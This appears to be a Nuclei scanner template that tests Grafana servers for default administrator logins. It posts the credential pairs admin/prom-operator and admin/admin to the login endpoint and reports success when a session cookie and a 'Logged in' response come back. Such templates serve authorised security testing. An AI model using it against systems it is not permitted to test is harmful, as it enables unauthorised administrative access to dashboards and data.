id: grafana-default-login

info:
  name: Grafana Default Login
  author: d3sca
  severity: high
  tags: grafana,default-login


requests:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Referer: {{BaseURL}}
        content-type: application/json

        {"user":"{{username}}","password":"{{password}}"}

    attack: pitchfork
    payloads:
      username:
        - admin
        - admin
      password:
        - prom-operator
        - admin

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "grafana_session" # Login cookie
        part: header

      - type: word
        part: body
        words:
          - "Logged in" # Logged in keyword

      - type: status
        status:
          - 200
